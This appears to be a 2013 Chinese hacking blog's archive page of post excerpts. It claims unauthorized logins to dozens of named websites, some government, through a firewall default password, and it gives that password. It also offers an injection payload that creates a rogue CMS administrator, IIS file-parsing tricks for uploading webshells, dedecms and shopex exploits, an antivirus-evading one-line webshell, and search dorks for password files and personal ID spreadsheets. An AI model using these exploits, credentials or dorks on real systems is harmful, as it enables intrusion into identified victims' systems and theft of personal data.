09 2013 档案

网站指纹识别工具——WhatWeb v0.4.7发布
摘要:WhatWeb是一款网站指纹识别工具,主要针对的问题是:“这个网站使用的什么技术?”WhatWeb可以告诉你网站搭建使用的程序,包括何种CMS系统、什么博客系统、Javascript库、web服务器、内嵌设备等。WhatWeb有超过900个插件,并且可以识别版本号、email地址、账号、web框架、SQL错误等等。* 超过900个插件* 高效、迅速、低碳* 插件包括应用实例URL* 多种日志格式:XML,JSON,MagicTree, RubyObject, MongoDB* 优质的web爬虫* Proxy support including TOR* 可定制化HTTP头* 可进行基础的认证. 阅读全文

posted @ 2013-09-28 21:55 heikeboy’s Blog 阅读(424) 评论(0) 推荐(0)

Web应用安全十大主动安全措施
摘要:这几天有空参加了360主办的第一届互联网安全大会(ISC 2013),除了现场看到FREEBUF现场微博号发的众多妹子之外,也听到了很多有趣的议题,比如TK分享的通过网络运营商缓存服务器偷渡,只需一台电脑,一根网线,就能对任何网站实施挂马攻击,感受颇多,明天继续参加WEB应用安全论坛,在参加之前,也浅谈分享下自己在WEB应用安全方面的一些心得,众大牛轻喷。1:Content-Security-PolicyContent Security Policy是Mozilla为了提高浏览器安全性开发的一套新的安全机制,该机制让网站可以定义内容安全政策,明确告知浏览器哪些内容是合法的,让浏览器得以避开恶意 阅读全文

posted @ 2013-09-28 21:54 heikeboy’s Blog 阅读(408) 评论(0) 推荐(0)

大量政府站未修改某防火墙默认密码可登陆控制(已控制数十台设备)
摘要:intitle:topsec tos web user interface大概400多个搜索结果。绝大部分都是天融信的防火墙。本来想暴力破解来着,试了下,web和telnet都防护。尝试几次就锁定了。可是改一下默认密码有那么难么!本来安全只有4分的话,装了个防火墙瞬间到零了。。。天融信默认密码其中一个:superman talent。只使用这个密码成功登录的列表 如下:共58台。yhztb.cnskdfz.comywczjgw.comwww.landks.comsunong.cnta-police.comczrcw.comscanju.gov.cnlyghb.gov.cndyyz.netglg 阅读全文

posted @ 2013-09-26 23:33 heikeboy’s Blog 阅读(1318) 评论(0) 推荐(0)

网站整站下载工具—HTTrack Website Copier
摘要:HTTrack是一个免费和易用的离线浏览工具(浏览器),它可以允许你下载整个WWW网站至本地目录,并且通过遍历网站目录获取HTML,图片和其他文件,是安全渗透测试和居家旅行必备软件。WinHTTrack是HTTrack的Windows版本,支持Windows 2000/XP/Vista/7,WebHTTrack是Linux/Unix/BSD版本。http://www.httrack.com/page/2/en/index.html 阅读全文

posted @ 2013-09-23 21:52 heikeboy’s Blog 阅读(668) 评论(0) 推荐(0)

解析漏洞总结
摘要:[+]IIS 6.001.目录解析:/xx.asp/xx.jpgxx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码02.IIS6.0 会将 xx.jpg 解析为 asp 文件。03.后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)04.IIS6.0 都会把此类后缀文件成功解析为 asp 文件。05.默认解析:/xx.asa /xx.cer /xx.cdx06.IIS6.0 默认的可执行文件除了 asp 还包含这三种07.此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;. 阅读全文

posted @ 2013-09-23 05:06 heikeboy’s Blog 阅读(489) 评论(0) 推荐(1)

IIS 7.5最新解析漏洞
摘要:IIS7.5解析漏洞http://www.cnk0n9.com/fckeditor/editor/fckeditor.html,上传图片,浏览,上传一个aspx的一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg上传后直接得到上传地址 阅读全文

posted @ 2013-09-19 09:55 heikeboy’s Blog 阅读(4087) 评论(0) 推荐(0)

测试秒杀新版本3.5 stieserver cms
摘要:EXP: 直接访问UserCenter/login.aspx用户名处输入: 123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into 阅读全文

posted @ 2013-09-19 09:53 heikeboy’s Blog 阅读(249) 评论(0) 推荐(0)

Google 黑客搜索技巧
摘要:常用的google关键字:foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)operatorfoofiletype123 类型sitefoo.com 相对直接看网站更有意思,可以得到许多意外的信息intextfoointitle fooltitle 标题哦allinurlfoo 搜索xx网站的所有相关连接。(踩点必备)linksfoo 不要说就知道是它的相关链接allintiltefoo.com我们可以辅助- +来调整搜索的精确程度直接搜索密码:(引号表示为精确搜索)当然我们可以再延伸到上面的结果里进行二次搜索index of htpasswd passwdfiletypexls 阅读全文

posted @ 2013-09-18 08:35 heikeboy’s Blog 阅读(1617) 评论(0) 推荐(0)

dedecms最新版本修改任意管理员漏洞+getshell+exp
摘要:此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.phpif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) {... 阅读全文

posted @ 2013-09-16 05:03 heikeboy’s Blog 阅读(1108) 评论(0) 推荐(0)

shopex最新版前台一处想不到的SQL注入漏洞
摘要:shopex代码核心的地方都做了加密处理,找漏洞就需要一点想象空间了,比如这个SQL注入…存在于用户注册(想不到的位置吧?)/core/shop/controller/ctl.passport.php 267行if( !$info = $account->create($_POST,$message) ) {…2.看到1,想到有没有可能$account->create是foreach $_POST构造sql语句的呐?3.看数据表结构:果断提交时$_POST里加入member_id测试(其实测试时我还试了mobile等,嘿,只捡有用的字段说),然后就有了下图:修复方案插入时去掉mem 阅读全文

posted @ 2013-09-09 03:30 heikeboy’s Blog 阅读(555) 评论(0) 推荐(0)

经过变异新的一句话(过360,安全狗)
摘要:只测试了360网马查杀和安全狗网马查杀,均未被发现range(1,200)----新建一个1到200的数组。range(a,z)就是一个a到z的数组;大小写有区别chr()----转换ASCIIchr($a[51])--------是密码4,实际是chr(52)。也可以把[chr($a[51])]改为['4']$a[51]就是数组的$a的第51个数的值(52)。因为数组的值是从0开始数的,所以第51位为52.原一句话:assert()----跟eval()意思差不多都用来执行语句的重点是{},变量分离;这样{}中的就是字符串,也就可以把_POST转码eg:<?php$f4 阅读全文

posted @ 2013-09-09 03:28 heikeboy’s Blog 阅读(628) 评论(0) 推荐(0)

google高级搜索
摘要:ext:php program_listing intitle:MythWeb.Program.Listinginurl:preferences.ini “[emule]”intitle:”Index of /CFIDE/” administrator“access denied for user” “using password”ext:php intext:”Powered by phpNewMan Version” 可以看到:path/to/news/browse.php?clang=../../../../../../file/i/wantinurl:”/becommunity/com 阅读全文

posted @ 2013-09-06 00:23 heikeboy’s Blog 阅读(2415) 评论(0) 推荐(0)

搜索入侵之-“火眼金金”
摘要:filetype:xls "姓名" "性别" "身份证号码"得出结果 阅读全文

posted @ 2013-09-04 23:04 heikeboy’s Blog 阅读(259) 评论(0) 推荐(0)

搜索入侵之-“神乎奇神”
摘要:关键字:"index of"/upload site:jp 阅读全文

posted @ 2013-09-04 07:13 heikeboy’s Blog 阅读(163) 评论(0) 推荐(0)